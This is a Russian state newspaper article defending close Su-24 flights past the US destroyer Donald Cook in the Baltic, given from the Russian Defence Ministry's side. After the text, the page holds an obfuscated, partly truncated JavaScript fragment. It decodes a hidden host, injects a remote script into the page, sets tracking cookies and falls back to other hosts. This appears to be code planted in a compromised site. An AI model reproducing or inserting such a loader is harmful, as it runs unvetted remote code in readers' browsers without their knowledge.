У "Кука" глаза велики

У "Кука" глаза велики
Текст: Юрий Гаврилов
Российская газета - Федеральный выпуск №6949 (81)
 
Российские военные самолеты опять напугали экипаж эсминца ВМС США
 
Вчера в Минобороны России прокомментировали резкие высказывания пресс-секретаря Белого дома Джошуа Эрнеста по поводу пролета наших боевых самолетов над районом Балтики, где находился эсминец ВМС США "Дональд Кук".

По утверждениям западной прессы, в минувший понедельник пара бомбардировщиков Су-24 пронеслась над этим кораблем на высоте 30 метров и на расстоянии менее километра. А днем позже "сухие" вроде бы так приблизились к эсминцу, что его окатила волна, поднятая в море реактивной струей российских самолетов. Сообщалось, что все эти маневры наши военные якобы даже снимали с вертолета Ка-27. А когда экипаж "Дональда Кука" попытался на русском и английском языках связаться по радио с российскими летчиками, то ответа не получил.

В то же время западные СМИ признали: ни в первом, ни во втором случае Су-24 боекомплекта на борту не имели. Тем не менее действия российской военной авиации пресс-секретарь Белого дома назвал "не соответствующими принятым нормам поведения вооруженных сил в международном воздушном и морском пространствах".

Читайте также

Фото: REUTERS/US NAVY
Минобороны РФ назвало безопасным пролет Су-24 над эсминцем США

С этим утверждением в Минобороны России категорически не согласны. Официальный представитель ведомства генерал Игорь Конашенков сообщил корреспонденту "РГ", что 13 апреля экипажи самолетов Су-24 действительно выполняли плановые учебно-тренировочные полеты над нейтральными водами Балтийского моря. И их маршрут на самом деле проходил через район, где находился эсминец "Дональд Кук". При этом генерал уточнил: от военно-морской базы РФ данный район отделяют примерно 70 км. "Обнаружив корабль в зоне визуальной видимости, российские летчики совершили отворот от него с соблюдением всех мер безопасности", - заявил Конашенков.

Откровенно говоря, не понятна причина такой болезненной реакции наших американских коллег, - недоумевал он. - В оперативной близости от российской военно-морской базы Балтийского флота принцип свободы судоходства эсминца ВМС США вовсе не отменяет принцип свободы воздухоплавания российских воздушных судов.

От нашей военно-морской базы на Балтике район нахождения эсминца США отделяют примерно 70 километров

В географии морских походов "Дональда Кука" за последние несколько лет обращает на себя внимание такая деталь: эсминец то и дело появляется неподалеку от российских берегов. В 2014 и 2015 годах в Черном море он много раз курсировал неподалеку от Крыма.

Теперь обосновался на Балтике, причем, как уже было сказано выше, всего в 70 км от нашей военно-морской базы.

Речь, заметим, идет не о старой и плохо вооруженной "посудине". Эсминец несет на борту от 56 до 96 крылатых ракет "Томагавк" с дальностью полета до 2500 километров. Которые, к тому же, могут быть оснащены ядерными зарядами. А еще на "Дональде Куке" установлена боевая информационно-управляющая система "Иджис", объединяющая средства ПВО-ПРО всех аналогичных кораблей в общую сеть. Это позволяет им одновременно сопровождать и обстреливать сотни целей.

Понятно, что близкое соседство этого корабля с нашими берегами не может не тревожить российское командование. Вытеснять эсминец из нейтральных вод оно не имеет права. А вот "намекнуть" американцам с помощью тех же Су-24, что все маневры "Кука" наши военные постоянно отслеживают, что в случае угрожающих действий корабль ждет быстрый и жесткий отпор, явно нелишне.

К подобной реакции российских военных экипажу "Кука" не привыкать. Корабль вот так же облетывали Су-24 на Черном море. А когда в ответ на его приближение к Крыму на полуострове развернули пусковую установку "Бастион" и включили комплекс разведки "Монолит-Б", американцы испытали настоящий шок. Их бортовая аппаратура сообщила: корабль находится в зоне поражения российскими ракетами "Яхонт".

Дальше испытывать судьбу экипаж не стал и спешно ретировался в сторону Босфора.

 

<script type="text/javascript">// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "maxpark.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>